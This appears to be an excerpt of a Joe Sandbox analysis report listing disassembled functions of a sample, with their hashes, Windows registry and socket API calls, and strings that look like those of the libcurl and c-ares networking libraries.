                                                        • Opcode Fuzzy Hash: 8ad33cb1fa7416a2c9d60e1b3f3e9870f0fda74bb2431e8939daa0deabb840fa
                                                        • Instruction Fuzzy Hash: D6C180756043059FF718DF24C884AAA7BE2FF88354F05896CE8598B3A1E735ED85CB81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e26a153e81584ecf9fd5fe6cb5cab281f3d831e0f354741f09e4fefa567a67bd
                                                        • Instruction ID: fc98c1e228ae273f847155d4eca848b86e7961bbeef2078ab371c9685684d80c
                                                        • Opcode Fuzzy Hash: e26a153e81584ecf9fd5fe6cb5cab281f3d831e0f354741f09e4fefa567a67bd
                                                        • Instruction Fuzzy Hash: E891F43060C3094BD7358A2988947BB72D5EFC5368F148B2EE8A9433D4FB799C81D697
                                                        APIs
                                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0050712E,?,?,?,00001001,00000000), ref: 0051A90C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: recvfrom
• String ID:
• API String ID: 846543921-0
• Opcode ID: cea2f0178a491f0254c53f49facc1bff984835ca7636e56950662f395d0a6d88
• Instruction ID: f738946e989af142a7bc4871fb51cb76c6a3e320fed211b032ac0d03d7c0e540
• Opcode Fuzzy Hash: cea2f0178a491f0254c53f49facc1bff984835ca7636e56950662f395d0a6d88
• Instruction Fuzzy Hash: 34F01D75109348AFE2209E41DC44DABBBEDFFC9764F05496DF958232119271AE50CAB2
APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0050AA19
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0050AA4C
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0050AA97
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0050AAE9
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0050AB30
• RegCloseKey.KERNELBASE(?), ref: 0050AB6A
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0050AB82
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0050AC46
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0050AD0A
• RegEnumKeyExA.KERNELBASE ref: 0050AD8D
• RegCloseKey.KERNELBASE(?), ref: 0050ADD9
• RegEnumKeyExA.KERNELBASE ref: 0050AE08
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0050AE2A
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0050AE54
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0050AF63
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0050AFB2
• RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0050B072
Strings
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: QueryValue$Open$CloseEnum
• String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
• API String ID: 4217438148-1047472027
• Opcode ID: a1284b93ee716cfa52cd7d59ef0f29d600121735790511fb23da866d847846c3
• Instruction ID: 754e5634548068e7ea56561dd0006274ce8952e1255ff5271eb1e02c6884b2cc
• Opcode Fuzzy Hash: a1284b93ee716cfa52cd7d59ef0f29d600121735790511fb23da866d847846c3
• Instruction Fuzzy Hash: B0728EB1608301ABE720DB24CC85B6FBBE8BF85744F144828F9859B2E1E775E944CB53
APIs
• setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0048A832
Strings
• Bind to local port %d failed, trying next, xrefs: 0048AFE5
• cf_socket_open() -> %d, fd=%d, xrefs: 0048A796
• Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0048AD0A
• bind failed with errno %d: %s, xrefs: 0048B080
• @, xrefs: 0048A8F4
• Name '%s' family %i resolved to '%s' family %i, xrefs: 0048ADAC
• Trying [%s]:%d..., xrefs: 0048A689
• Local port: %hu, xrefs: 0048AF28
• @, xrefs: 0048AC42
• cf-socket.c, xrefs: 0048A5CD, 0048A735
• Local Interface %s is ip %s using address family %i, xrefs: 0048AE60
• sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0048A6CE
• Couldn't bind to '%s' with errno %d: %s, xrefs: 0048AE1F
• Could not set TCP_NODELAY: %s, xrefs: 0048A871
• Trying %s:%d..., xrefs: 0048A7C2, 0048A7DE
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: setsockopt
• String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
• API String ID: 3981526788-2373386790
• Opcode ID: a71eca29179885f9d235b7e87d98a906b97617112133165ebdc51a8c97307deb
• Instruction ID: 1facc89ce2f4f99a878eb19abcd5afee83062fc92213e82b65e8b853714833cd
• Opcode Fuzzy Hash: a71eca29179885f9d235b7e87d98a906b97617112133165ebdc51a8c97307deb
• Instruction Fuzzy Hash: DD620571508341ABE720AF14C846BAFB7E4AF81308F044D1FF98897252E7B9E855CB97

Control-flow Graph (rendered graph for function 519740; legend: Executed / Not Executed; raw node and edge data not reproduced)
APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00519946
• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00519974
• RegCloseKey.KERNELBASE(?), ref: 0051998B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
• API String ID: 3677997916-615551945
• Opcode ID: 98f93fd9c82a11b41047cee55be7ac8f1535a20e369f1583842ecaf27d052650
• Instruction ID: 36ee62e532a2e1eb38f83849232db24a1f40e52462d2dff2d38acb5bd78ae85a
• Opcode Fuzzy Hash: 98f93fd9c82a11b41047cee55be7ac8f1535a20e369f1583842ecaf27d052650
• Instruction Fuzzy Hash: 7632B6B5904202ABFB11AB24EC56A9B7EE4BF94314F184834F80997253FB31ED55C793

Control-flow Graph (rendered graph for function 488b50; legend: Executed / Not Executed; raw node and edge data not reproduced)
APIs
• connect.WS2_32(?,?,00000001), ref: 00488C2F
• SleepEx.KERNELBASE(00000000,00000000), ref: 00488CF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Sleepconnect
                                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                        • API String ID: 238548546-879669977
                                                        • Opcode ID: a8f2d819e697fbff3480ed97fd65d99d6423623d7010596cd114313b1f6532f2
                                                        • Instruction ID: 6af56de7c022b9e6e11ae80736ff39d4059db3d2506e4133d24f802a90c2fdb7
                                                        • Opcode Fuzzy Hash: a8f2d819e697fbff3480ed97fd65d99d6423623d7010596cd114313b1f6532f2
                                                        • Instruction Fuzzy Hash: 66B1BF70604705AFD710EF24C885BABB7E0AF81318F44892EF8598B392DB79EC55C766

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 452f17-452f8c, basic blocks through 4531d3-4531d6; API calls RegOpenKeyExA (blocks 452f91-452ff4 and 453010-453083), RegEnumKeyExA (block 45315c-4531ac), RegQueryValueExA (block 453089-4530d4) and RegCloseKey (block 45313b-45314b); internal calls to 8d98f0, 8d9ce0, 451619, 8d9bc0, 8d9c50, 8d9af0, 8d8050.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: EnumOpen
                                                        • String ID: d
                                                        • API String ID: 3231578192-2564639436
                                                        • Opcode ID: 389dba9167043c7034d786ef7941c2897fde19cbe84653c8f3ce1d4972da1a72
                                                        • Instruction ID: b8d2cd7f5aea72f38e60c6607236b4c9e173eb7e06a0ea26e71a4f50dfaa50a5
                                                        • Opcode Fuzzy Hash: 389dba9167043c7034d786ef7941c2897fde19cbe84653c8f3ce1d4972da1a72
                                                        • Instruction Fuzzy Hash: 757192B49043199FDB10DF69D58479EBBF0BF84308F10896EE89897311E7749A89CF92

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 4576a0-4576be, basic blocks through 45775e-457762; API call send (block 4576e6-4576f2); internal calls to 4572a0, 45cb20, 7d8c50.
                                                        APIs
                                                        • send.WS2_32(multi.c,?,?,?,N=E,00000000,?,?,004607BF), ref: 004576EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID: LIMIT %s:%d %s reached memlimit$N=E$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                        • API String ID: 2809346765-2851504179
                                                        • Opcode ID: 365c7c6ef27b26e465b5668ccb976e2d10a757f1af814ec8d5207aba691a91a7
                                                        • Instruction ID: d7e6be8e5e363864344db8a3a61599025bac68cea7e281afea032cb44b9c9a3c
                                                        • Opcode Fuzzy Hash: 365c7c6ef27b26e465b5668ccb976e2d10a757f1af814ec8d5207aba691a91a7
                                                        • Instruction Fuzzy Hash: F2113AB1A183047BD1209B15BC9AF2B3B9CDBC2B2CF45092DBC0527343D6699D0482B7

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 489290-4892ed, basic blocks through 489456-489470; API calls WSAIoctl (block 489335-489364) and setsockopt (block 489371-489390); internal calls to 4576a0, 46d090, 494f40, 46d8c0, 46d9a0, 4950a0.
                                                        APIs
                                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0048935D
                                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00489389
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Ioctlsetsockopt
                                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                        • API String ID: 1903391676-2691795271
                                                        • Opcode ID: a8699b485ebe26a04d49c32c06d82223fd54cb822228907497f5e5ea21ec4b7d
                                                        • Instruction ID: 80f7ebe151046aade4f67f3aef447a44c1b25d60a4d7ff8393fcc5fb7c19a88c
                                                        • Opcode Fuzzy Hash: a8699b485ebe26a04d49c32c06d82223fd54cb822228907497f5e5ea21ec4b7d
                                                        • Instruction Fuzzy Hash: 1151D170A04705ABD711EF25C881FBA77A5FF88718F18892AFD488B382E734E951C755

                                                        Control-flow Graph

                                                        • Graph not reproduced (rendered as an image in the report): entry block 457770-45778e, basic blocks through 45782e-457832; API call recv (block 4577b6-4577c2); internal calls to 4572a0, 45cb20, 7d8c50.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                        • API String ID: 1507349165-640788491
                                                        • Opcode ID: d3abacb5cc9b4008f87a22f84e3caff0a6f0ee02f6d944e0ae5946802a86da4a
